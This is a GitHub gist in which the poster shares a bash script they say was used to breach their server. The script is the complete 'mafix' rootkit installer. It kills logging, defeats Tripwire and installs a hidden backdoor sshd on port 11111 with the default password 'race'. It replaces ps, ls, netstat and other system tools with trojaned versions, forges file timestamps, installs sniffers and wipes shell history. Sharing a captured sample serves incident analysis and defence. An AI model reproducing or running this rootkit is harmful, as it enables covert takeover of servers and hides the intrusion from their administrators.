Created
March 21, 2014 04:17
-
-
Save bhurlow/9679421 to your computer and use it in GitHub Desktop.
backdoor script used to breach one of my servers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
###################### | |
# mafix 0.2 # | |
# fud 2009/07/15 # | |
###################### | |
BASEDIR=`pwd` | |
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin | |
BLK='[1;30m' | |
MAG='[1;35m' | |
CYN='[1;30m' | |
RED='^[[1;32m' | |
DMAG='[1;37m' | |
RES='[0m' | |
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}" | |
echo "${CYN} /__/\ / /\ / /\ ${DMAG} ___ ${CYN} /__/| ${RES}" | |
echo "${CYN} | |::\ / /::\ / /:/_ ${DMAG} / /\ ${CYN} | |:| ${RES}" | |
echo "${CYN} | |:|:\ / /:/\:\ / /:/ /\ ${DMAG} / /:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} __|__|:|\:\ / /:/~/::\ / /:/ /:/ ${DMAG}/__/::\ ${CYN} __|__|:| ${RES}" | |
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/ ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}" | |
echo "${CYN} \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ ${DMAG} \ \:\/\ ${CYN} ~\~~\::::/${RES}" | |
echo "${CYN} \ \:\ \ \::/ \ \::/ ${DMAG} \__\::/${CYN} |~~|:|~~ ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} /__/:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} \__\/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \__\/ \__\/ \__\/ ${DMAG} ${CYN} |__|/ ${RES}" | |
echo "${DMAG}${RES}" | |
echo "${DMAG} - the ferrari of rootkits - ${RES}" | |
sleep 5 | |
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}" | |
tar zxf mafixlibs | |
if [ "$(whoami)" != "root" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}" | |
exit | |
fi | |
cd $BASEDIR | |
sleep 1 | |
killall -9 syslogd >/dev/null 2>&1 | |
startime=`date +%S` | |
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}" | |
SYSLOGCONF="/etc/syslog.conf" | |
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2` | |
if [ ! -z "$REMOTE" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}" | |
echo | |
for host in $REMOTE; do | |
echo -n " " | |
echo $host | |
done | |
echo | |
echo ' ${CYN}coz this box is logging to it${RES}' | |
echo | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}" | |
fi | |
uname=`uname -n` | |
twd=/var/lib/tripwire/$uname.twd | |
if [ -d /etc/tripwire ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}" | |
if [ -f /var/lib/tripwire/$uname.twd ]; then | |
chattr -isa $twd | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}" | |
fi | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}" | |
fi | |
# restoring login | |
if [ -f /sbin/xlogin ]; then | |
chattr -isa /sbin/xlogin | |
chattr -isa /bin/login | |
mv -f /sbin/xlogin /bin/login | |
chmod 7455 /bin/login | |
chattr +isa /bin/login | |
fi | |
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}" | |
if [ -f /etc/sh.conf ]; then | |
chattr -isa /etc/sh.conf | |
rm -rf /etc/sh.conf | |
fi | |
# checking if we got needed libs and filez | |
if [ ! -f /lib/libproc.a ]; then | |
mv bin/lib/libproc.a /lib/ 2>/dev/null | |
fi | |
if [ ! -f /lib/libproc.so.2.0.6 ]; then | |
mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null | |
fi | |
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}" | |
/sbin/ldconfig >/dev/null 2>&1 | |
if [ ! -f /usr/bin/md5sum ]; then | |
touch -acmr /bin/ls bin/md5sum | |
cp bin/md5sum /usr/bin/md5sum | |
fi | |
DEFPASS=race | |
DEFPORT=11111 | |
if test -n "$1" ; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}" | |
cd $BASEDIR/bin | |
echo -n $1|md5sum > /etc/sh.conf | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}" | |
echo -n $DEFPASS|md5sum > /etc/sh.conf | |
fi | |
touch -acmr /bin/ls /etc/sh.conf | |
chown -f root:root /etc/sh.conf | |
chattr +isa /etc/sh.conf | |
if test -n "$2" ; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}" | |
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config | |
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h | |
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h | |
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 | |
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}" | |
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config | |
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h | |
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h | |
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 | |
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null | |
fi | |
if [ -f /lib/lidps1.so ]; then | |
chattr -isa /lib/lidps1.so | |
rm -rf /lib/lidps1.so | |
fi | |
if [ -f /usr/include/hosts.h ]; then | |
chattr -isa /usr/include/hosts.h | |
rm -rf /usr/include/hosts.h | |
fi | |
if [ -f /usr/include/file.h ]; then | |
chattr -isa /usr/include/file.h | |
rm -rf /usr/include/file.h | |
fi | |
if [ -f /usr/include/log.h ]; then | |
chattr -isa /usr/include/log.h | |
rm -rf /usr/include/log.h | |
fi | |
if [ -f /usr/include/proc.h ]; then | |
chattr -isa /usr/include/proc.h | |
rm -rf /usr/include/proc.h | |
fi | |
cd $BASEDIR | |
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null | |
touch -acmr /bin/ls /lib/lidps1.so | |
touch -acmr /bin/ls $BASEDIR/bin/headers/* | |
mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null | |
# Ok lets start creating dirs | |
SSHDIR=/lib/libsh.so | |
HOMEDIR=/usr/lib/libsh | |
if [ -d /lib/libsh.so ]; then | |
chattr -isa /lib/libsh.so | |
chattr -isa /lib/libsh.so/* | |
rm -rf /lib/libsh.so | |
fi | |
if [ -d /usr/lib/libsh ]; then | |
chattr -isa /usr/lib/libsh | |
chattr -isa /usr/lib/libsh/* | |
rm -rf /usr/lib/libsh/* | |
fi | |
mkdir $SSHDIR 2>/dev/null | |
touch -acmr /bin/ls $SSHDIR | |
mkdir $HOMEDIR 2>/dev/null | |
touch -acmr /bin/ls $HOMEDIR | |
cd $BASEDIR/bin | |
mv .sh/* $SSHDIR/ 2>/dev/null | |
mv .sh/.bashrc $HOMEDIR 2>/dev/null | |
if [ -f /sbin/ttyload ]; then | |
chattr -AacdisSu /sbin/ttyload | |
rm -rf /sbin/ttyload | |
fi | |
if [ -f /usr/sbin/ttyload ]; then | |
chattr -isa /usr/sbin/ttyload | |
rm -rf /usr/sbin/ttyload | |
fi | |
if [ -f /sbin/ttymon ]; then | |
chattr -isa /sbin/ttymon | |
rm -rf /sbin/ttymon | |
fi | |
mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null | |
chmod a+xr /sbin/ttyload 2>/dev/null | |
chmod o-w /sbin/ttyload 2>/dev/null | |
touch -acmr /bin/ls /sbin/ttyload | |
chattr +isa /sbin/ttyload | |
kill -9 `pidof ttyload` >/dev/null 2>&1 | |
mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null | |
chmod a+xr /sbin/ttymon 2>/dev/null | |
touch -acmr /bin/ls /sbin/ttymon | |
chattr +isa /sbin/ttymon | |
kill -9 `pidof ttymon` >/dev/null 2>&1 | |
cp /bin/bash $SSHDIR | |
# INITTAB SHUFFLING | |
chattr -isa /etc/inittab | |
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1 | |
cat /etc/inittab |grep getty > /tmp/.init2 | |
echo "# Loading standard ttys" >> /tmp/.init1 | |
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1 | |
cat /tmp/.init2 >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# modem getty." >> /tmp/.init1 | |
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# fax getty (hylafax)" >> /tmp/.init1 | |
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# vbox (voice box) getty" >> /tmp/.init1 | |
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1 | |
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# end of /etc/inittab" >> /tmp/.init1 | |
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload | |
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload | |
touch -acmr /bin/ls /usr/sbin/ttyload | |
chmod +x /usr/sbin/ttyload 2>/dev/null | |
chattr +isa /usr/sbin/ttyload | |
/usr/sbin/ttyload >/dev/null 2>&1 | |
touch -amcr /etc/inittab /tmp/.init1 | |
mv -f /tmp/.init1 /etc/inittab 2>/dev/null | |
rm -rf /tmp/.init2 | |
# MAKING SURE WE GOT IT BACKDORED RIGHT ! | |
if [ ! "`grep ttyload /etc/inittab`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}" | |
fi | |
# Say hello to md5sum fixer boys n gurls ! | |
if [ -f /sbin/ifconfig ]; then | |
/usr/bin/md5sum /sbin/ifconfig >> .shmd5 | |
fi | |
if [ -f /bin/ps ]; then | |
/usr/bin/md5sum /bin/ps >> .shmd5 | |
fi | |
if [ -f /bin/ls ]; then | |
/usr/bin/md5sum /bin/ls >> .shmd5 | |
fi | |
if [ -f /bin/netstat ]; then | |
/usr/bin/md5sum /bin/netstat >> .shmd5 | |
fi | |
if [ -f /usr/bin/find ]; then | |
/usr/bin/md5sum /usr/bin/find >> .shmd5 | |
fi | |
if [ -f /usr/bin/top ]; then | |
/usr/bin/md5sum /usr/bin/top >> .shmd5 | |
fi | |
if [ -f /usr/sbin/lsof ]; then | |
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5 | |
fi | |
if [ -f /usr/bin/slocate ]; then | |
/usr/bin/md5sum /usr/bin/slocate >> .shmd5 | |
fi | |
if [ -f /usr/bin/dir ]; then | |
/usr/bin/md5sum /usr/bin/dir >> .shmd5 | |
fi | |
if [ -f /usr/bin/md5sum ]; then | |
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5 | |
fi | |
if [ ! -f /dev/srd0 ]; then | |
./encrypt -e .shmd5 /dev/srd0 | |
touch -acmr /bin/ls /dev/srd0 | |
chattr a+r /dev/srd0 | |
chown -f root:root /dev/srd0 | |
fi | |
rm -rf .shmd5 | |
# time change bitch | |
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1 | |
touch -acmr /bin/ps ps >/dev/null 2>&1 | |
touch -acmr /bin/ls ls >/dev/null 2>&1 | |
touch -acmr /bin/netstat netstat >/dev/null 2>&1 | |
touch -acmr /usr/bin/find find >/dev/null 2>&1 | |
touch -acmr /usr/bin/top top >/dev/null 2>&1 | |
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1 | |
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1 | |
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1 | |
touch -acmr /usr/bin/dir dir >/dev/null 2>&1 | |
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1 | |
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1 | |
# Backdoor ps/top/du/ls/netstat/etc.. | |
cd $BASEDIR/bin | |
BACKUP=/usr/lib/libsh/.backup | |
mkdir $BACKUP 2>/dev/null | |
# ps ... | |
if [ -f /usr/bin/ps ]; then | |
chattr -isa /usr/bin/ps | |
cp /usr/bin/ps $BACKUP | |
mv -f ps /usr/bin/ps 2>/dev/null | |
chattr +isa /usr/bin/ps | |
fi | |
if [ -f /bin/ps ]; then | |
chattr -isa /bin/ps | |
cp /bin/ps $BACKUP | |
mv -f ps /bin/ps 2>/dev/null | |
chattr +isa /bin/ps | |
fi | |
# ifconfig ... | |
chattr -isa /sbin/ifconfig | |
cp /sbin/ifconfig $BACKUP | |
mv -f ifconfig /sbin/ifconfig 2>/dev/null | |
chattr +isa /sbin/ifconfig | |
# netstat ... | |
if [ -f /usr/sbin/netstat ]; then | |
chattr -isa /usr/sbin/netstat | |
mv -f netstat /usr/sbin/netstat 2>/dev/null | |
chattr +isa /usr/sbin/netstat | |
fi | |
chattr -isa /bin/netstat | |
cp /bin/netstat $BACKUP | |
mv -f netstat /bin/netstat 2>/dev/null | |
chattr +isa /bin/netstat | |
# top ... | |
if [ -f /usr/bin/top ]; then | |
chattr -isa /usr/bin/top | |
cp /usr/bin/top $BACKUP | |
mv -f top /usr/bin/top 2>/dev/null | |
chattr +isa /usr/bin/top | |
if [ -f /lib/libncurses.so.5 ]; then | |
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null | |
fi | |
if [ -f /usr/lib/libncurses.so.5 ]; then | |
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null | |
fi | |
fi | |
# slocate ... | |
if [ -f /usr/bin/slocate ]; then | |
chattr -isa /usr/bin/slocate | |
cp /usr/bin/slocate $BACKUP | |
mv -f slocate /usr/bin/slocate 2>/dev/null | |
chattr +isa /usr/bin/slocate | |
fi | |
# ls ... | |
chattr -isa /bin/ls | |
cp /bin/ls $BACKUP | |
mv -f ls /bin/ls 2>/dev/null | |
chattr +isa /bin/ls | |
# find ... | |
if [ -f /usr/bin/find ]; then | |
chattr -isa /usr/bin/find | |
cp /usr/bin/find $BACKUP | |
mv -f find /usr/bin/find 2>/dev/null | |
chattr +isa /usr/bin/find | |
fi | |
# dir ... | |
if [ -f /usr/bin/dir ]; then | |
chattr -isa /usr/bin/dir | |
cp /usr/bin/dir $BACKUP | |
mv -f dir /usr/bin/dir 2>/dev/null | |
chattr +isa /usr/bin/dir | |
fi | |
# lsof ... | |
if [ -f /usr/sbin/lsof ]; then | |
chattr -isa /usr/sbin/lsof | |
cp /usr/sbin/lsof $BACKUP | |
mv -f lsof /usr/sbin/lsof 2>/dev/null | |
chattr +isa /usr/sbin/lsof | |
fi | |
# pstree ... | |
if [ -f /usr/bin/pstree ]; then | |
chattr -isa /usr/bin/pstree | |
cp /usr/bin/pstree $BACKUP | |
mv -f pstree /usr/bin/pstree 2>/dev/null | |
chattr +isa /usr/bin/pstree | |
fi | |
# md5sum ... | |
chattr -isa /usr/bin/md5sum | |
cp /usr/bin/md5sum $BACKUP | |
mv -f md5sum /usr/bin/md5sum 2>/dev/null | |
chattr +isa /usr/bin/md5sum | |
echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}" | |
cd $BASEDIR | |
mkdir $HOMEDIR/.sniff 2>/dev/null | |
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null | |
chmod +x $BASEDIR/bin/sshd 2>/dev/null | |
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null | |
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null | |
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null | |
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff | |
touch -acmr /bin/ls $HOMEDIR/.sniff/shp | |
touch -acmr /bin/ls $HOMEDIR/shsb | |
touch -acmr /bin/ls $HOMEDIR/hide | |
chmod +x $HOMEDIR/.sniff/* 2>/dev/null | |
chmod +x $HOMEDIR/shsb 2>/dev/null | |
chmod +x $HOMEDIR/hide 2>/dev/null | |
./bin/sshd $1 $2 >> /dev/null | |
echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}" | |
ps aux > /tmp/.procs | |
if [ "`cat /tmp/.procs | grep named`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}" | |
fi | |
if [ -f /usr/sbin/wu.ftpd ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}" | |
fi | |
if [ "`cat /tmp/.procs | grep smbd`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}" | |
fi | |
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}" | |
fi | |
rm -rf /tmp/.procs | |
netstat -natp > /tmp/.stats | |
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}" | |
fi | |
rm -rf /tmp/.stats | |
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS | |
mkdir $HOMEDIR/.owned 2>/dev/null | |
if [ -f /etc/ttyhash ]; then | |
chattr -AacdisSu /etc/ttyhash | |
rm -rf /etc/ttyhash | |
fi | |
if [ -d /lib/ldd.so ]; then | |
chattr -isa /lib/ldd.so | |
chattr -isa /lib/ldd.so/* | |
mv /lib/ldd.so $HOMEDIR/.owned/tk8 | |
echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}" | |
fi | |
if [ -d /usr/src/.puta ]; then | |
chattr -isa /usr/src/.puta | |
chattr -isa /usr/src/.puta/* | |
mv /usr/src/.puta $HOMEDIR/.owned/tk7 | |
echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}" | |
fi | |
if [ -f /usr/sbin/xntpd ]; then | |
chattr -isa /usr/sbin/xntpd | |
rm -rf /usr/sbin/xntpd | |
fi | |
if [ -f /usr/sbin/nscd ]; then | |
chattr -isa /usr/sbin/nscd | |
rm -rf /usr/sbin/nscd | |
fi | |
if [ -d /usr/include/bex ]; then | |
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz | |
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h | |
chattr -isa /usr/include/bex | |
chattr -isa /usr/include/bex/* | |
mv /usr/include/bex/ $HOMEDIR/.owned/bex2 | |
if [ -f /var/log/tcp.log ]; then | |
chattr -isa /var/log/tcp.log | |
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog | |
fi | |
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1 | |
rm -rf /usr/bin/sshd2 >/dev/null 2>&1 | |
echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}" | |
fi | |
if [ -d /dev/tux/ ]; then | |
chattr -isa /usr/bin/xsf >/dev/null 2>&1 | |
rm -rf /usr/bin/xsf >/dev/null 2>&1 | |
chattr -isa /usr/bin/xchk >/dev/null 2>&1 | |
rm -rf /usr/bin/xchk >/dev/null 2>&1 | |
chattr -isa /dev/tux >/dev/null 2>&1 | |
mv /dev/tux $HOMEDIR/.owned/tuxkit | |
echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}" | |
fi | |
if [ -f /usr/bin/ssh2d ]; then | |
chattr -isa /usr/bin/ssh2d | |
rm -rf /usr/bin/ssh2d | |
chattr -isa /lib/security/.config/ | |
chattr -isa /lib/security/.config/* | |
rm -rf /lib/security/.config | |
echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}" | |
fi | |
if [ -f /etc/ld.so.hash ]; then | |
chattr -isa /etc/ld.so.hash | |
rm -rf /etc/ld.so.hash | |
fi | |
chattr +isa /usr/lib/libsh | |
chattr +isa /lib/libsh.so | |
# GREPPING SHITZ FROM rc.sysinit and inetd.conf | |
if [ -f /etc/rc.d/rc.sysinit ]; then | |
chattr -isa /etc/rc.d/rc.sysinit | |
cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/usr/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep | |
chmod +x /tmp/.grep | |
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep | |
mv -f /tmp/.grep /etc/rc.d/rc.sysinit | |
rm -rf /tmp/.grep | |
fi | |
if [ -f /etc/inetd.conf ]; then | |
chattr -isa /etc/inetd.conf | |
cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep | |
touch -acmr /etc/inted.conf /tmp/.grep | |
mv -f /tmp/.grep /etc/inetd.conf | |
rm -rf /tmp/.grep | |
fi | |
# KILLING SOME LAMME DAEMONS | |
killall -9 -q nscd >/dev/null 2>&1 | |
killall -9 -q xntps >/dev/null 2>&1 | |
killall -9 -q mountd >/dev/null 2>&1 | |
killall -9 -q mserv >/dev/null 2>&1 | |
killall -9 -q psybnc >/dev/null 2>&1 | |
killall -9 -q t0rns >/dev/null 2>&1 | |
killall -9 -q linsniffer >/dev/null 2>&1 | |
killall -9 -q sniffer >/dev/null 2>&1 | |
killall -9 -q lpsched >/dev/null 2>&1 | |
killall -9 -q sniff >/dev/null 2>&1 | |
killall -9 -q sn1f >/dev/null 2>&1 | |
killall -9 -q sshd2 >/dev/null 2>&1 | |
killall -9 -q xsf >/dev/null 2>&1 | |
killall -9 -q xchk >/dev/null 2>&1 | |
killall -9 -q ssh2d >/dev/null 2>&1 | |
echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}" | |
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-` | |
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}" | |
uname -a | awk '{ print $11 }' >/tmp/info_tmp | |
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}" | |
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep \eth | wc -l`" ] active adapters.${RES}" | |
if [ -f /etc/redhat-release ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}" | |
elif [ -f /etc/slackware-version ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}" | |
elif [ -f /etc/debian_version ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}" | |
elif [ -f /etc/SuSE-release ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}" | |
elif [ -f /etc/issue ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}" | |
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}" | |
fi | |
echo | |
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}" | |
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE | |
if [ -f /.bash_history ]; then | |
chattr -isa /.bash_history >/dev/null 2>&1 | |
rm -rf /.bash_history | |
fi | |
if [ -f /bin/.bash_history ]; then | |
chattr -isa /bin/.bash_history | |
rm -rf /bin/.bash_history | |
fi | |
cd $BASEDIR | |
rm -rf /tmp/.r* | |
cd .. | |
rm -rf mafix* | |
echo -n "${CYN}done!${RES}" | |
echo | |
rm -rf /tmp/info_tmp | |
endtime=`date +%S` | |
echo | |
echo | |
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}" | |
echo "${CYN} /__/\ / /\ / /\ ${DMAG} ___ ${CYN} /__/| ${RES}" | |
echo "${CYN} | |::\ / /::\ / /:/_ ${DMAG} / /\ ${CYN} | |:| ${RES}" | |
echo "${CYN} | |:|:\ / /:/\:\ / /:/ /\ ${DMAG} / /:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} __|__|:|\:\ / /:/~/::\ / /:/ /:/ ${DMAG}/__/::\ ${CYN} __|__|:| ${RES}" | |
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/ ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}" | |
echo "${CYN} \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ ${DMAG} \ \:\/\ ${CYN} ~\~~\::::/${RES}" | |
echo "${CYN} \ \:\ \ \::/ \ \::/ ${DMAG} \__\::/${CYN} |~~|:|~~ ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} /__/:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} \__\/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \__\/ \__\/ \__\/ ${DMAG} ${CYN} |__|/ ${RES}" | |
echo "${DMAG}${RES}" | |
echo "${DMAG} Password: $1 ${RES}" | |
echo "${DMAG} Port: $2 ${RES}" | |
if [ -f /usr/sbin/syslogd ]; then | |
/usr/sbin/syslogd -m 0 | |
else | |
/sbin/syslogd -m 0 | |
fi | |
if [ -f /usr/sbin/inetd ]; then | |
killall -HUP inetd >/dev/null 2>&1 | |
elif [ -f /usr/sbin/xinetd ]; then | |
killall -HUP xinetd | |
fi | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
note the tripwire check